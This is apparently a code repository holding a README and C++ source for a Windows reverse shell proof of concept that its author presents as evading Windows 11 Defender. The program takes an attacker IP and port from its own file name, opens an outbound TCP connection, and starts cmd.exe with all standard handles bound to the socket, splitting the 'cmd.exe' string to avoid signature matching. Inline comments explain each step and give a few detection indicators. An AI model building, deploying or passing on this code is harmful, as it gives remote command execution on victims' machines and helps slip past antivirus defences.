├── README.md
└── Reverse_shell_2021_12.cpp
/README.md:
--------------------------------------------------------------------------------
1 | # Simple-Reverse-Shell
2 | Simple C++ reverse shell proof of concept that uses no obfuscation and was not detected by Windows 11 Defender at the time of publication.
3 |
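4 | The IP address and port are not compiled in; the program reads them from its own file name at start-up (e.g. 192x168x0x122_5555.exe, where each "x" stands for a dot and the number after "_" is the port). For defenders, an executable name of this shape is itself a useful hunting indicator.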
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Reverse_shell_2021_12.cpp:
--------------------------------------------------------------------------------
1 | #POC reverse shell written by Norbert Tihanyi to bypass Windows 11 Defender (December 2021)
2 | #Twitter: @TihanyiNorbert
3 |
4 | #include "stdafx.h"
5 | #include
6 | #include
7 | #include
8 |
9 | #pragma comment(lib,"ws2_32")
10 | #pragma warning(disable:4996)
// File-scope state shared with main().
// wsaData: Winsock start-up data filled in by WSAStartup().
// s1: the socket main() creates with WSASocket() and connects with WSAConnect().
WSADATA wsaData; SOCKET s1;
// Remote endpoint (address family, port, IPv4 address); populated in main().
struct sockaddr_in R;
// Start-up parameters passed to CreateProcess(); main() sets its three
// standard handles to s1.
STARTUPINFO A;
// Filled in by CreateProcess(); main() does not read it afterwards.
PROCESS_INFORMATION B;
using std::string;
// Returns the final component of the path `s`: everything after the last
// path separator ('\\' when built for Windows, '/' otherwise).
// A path that contains no separator at all yields an empty string, not the
// input itself.
string getFileName(const string& s) {
#ifdef _WIN32
    const char separator = '\\';
#else
    const char separator = '/';
#endif

    const size_t last = s.rfind(separator);
    if (last == string::npos) {
        return string();
    }

    // substr() without a count runs to the end of the string.
    return s.substr(last + 1);
}
30 |
// Entry point of the proof of concept.
//
// Sequence, as written below:
//   1. detach from the console and start Winsock 2.2;
//   2. take the program's own file name from argv[0], drop the last four
//      characters, turn every 'x' into '.', and split at the last '_' into an
//      IPv4 address and a port;
//   3. open a TCP socket and connect it to that address and port;
//   4. start cmd.exe with handle inheritance enabled and with stdin, stdout and
//      stderr all set to the connected socket.
//
// None of the API return values are checked, and nothing is closed or cleaned
// up before main() ends.
//
// Behaviour visible to monitoring: a console detach, one outbound TCP
// connection whose destination matches the address encoded in the image name,
// then a cmd.exe child created by this process with inherited handles.
int main(int argc, char *argv[])
{
    FreeConsole(); // detach from the console so no console window stays attached to this process
    WSAStartup(MAKEWORD(2, 2), &wsaData); // request Winsock 2.2; result not checked
    // getFileName() returns "" when argv[0] contains no path separator.
    string path =getFileName(argv[0]);
    // Drops the last four characters; assumes the name ends in a four-character
    // extension such as ".exe" (not verified).
    path.resize(path.size() - 4); //remove .exe from the file
    // Every 'x' left in the name becomes '.', rebuilding the dotted IPv4 text.
    for (int i = 0; i < path.size(); i++) {
        if (path[i] == 'x') {
            path[i] = '.';
        }
    }
    // The last '_' separates the address (before it) from the port (after it).
    // The result of rfind() is not compared with npos.
    size_t i = path.rfind("_", path.length());
    // i - path.length() wraps around as an unsigned value; substr() clamps the
    // count to the end of the string, so this is "everything after the '_'".
    string port = path.substr(i+1, i-path.length());
    string ip = path.substr(0, i);
    // Plain TCP/IPv4 socket; protocol info, group and flags are all 0.
    s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
    R.sin_family = AF_INET;
    // Base 0 lets stoul() accept decimal, octal or hexadecimal text; the value
    // is narrowed to 16 bits when passed to htons().
    R.sin_port = htons(std::stoul(port, nullptr, 0));
    // Dotted-quad text to a network-order IPv4 address.
    R.sin_addr.s_addr = inet_addr(ip.c_str());
    WSAConnect(s1, (SOCKADDR*)&R, sizeof(R), 0, 0, 0, 0); // outbound connection; result not checked
    memset(&A, 0, sizeof(A));
    A.cb = sizeof(A);
    // STARTF_USESTDHANDLES: the child uses the hStd* handles set below.
    // STARTF_USESHOWWINDOW: wShowWindow is honoured; the memset above left it at 0.
    A.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    // All three standard handles of the child are the connected socket.
    A.hStdInput = A.hStdOutput = A.hStdError = (HANDLE)s1;
    // The command line "cmd.exe" is assembled at run time from two fragments,
    // so the full name does not appear as a single literal in this source.
    // Presumably this is meant to sidestep matching on that string; the
    // process-creation event for the cmd.exe child is unaffected by it.
    TCHAR c[256] = L"cm";
    TCHAR d[256] = L"d.exe";
    // Fifth argument 1 = inherit handles, which makes s1 usable in the child.
    // The result and the handles returned in B are not checked or closed.
    CreateProcess(NULL, _tcscat(c, d), 0, 0, 1, 0, 0, 0, &A, &B);

}
61 |
62 |
--------------------------------------------------------------------------------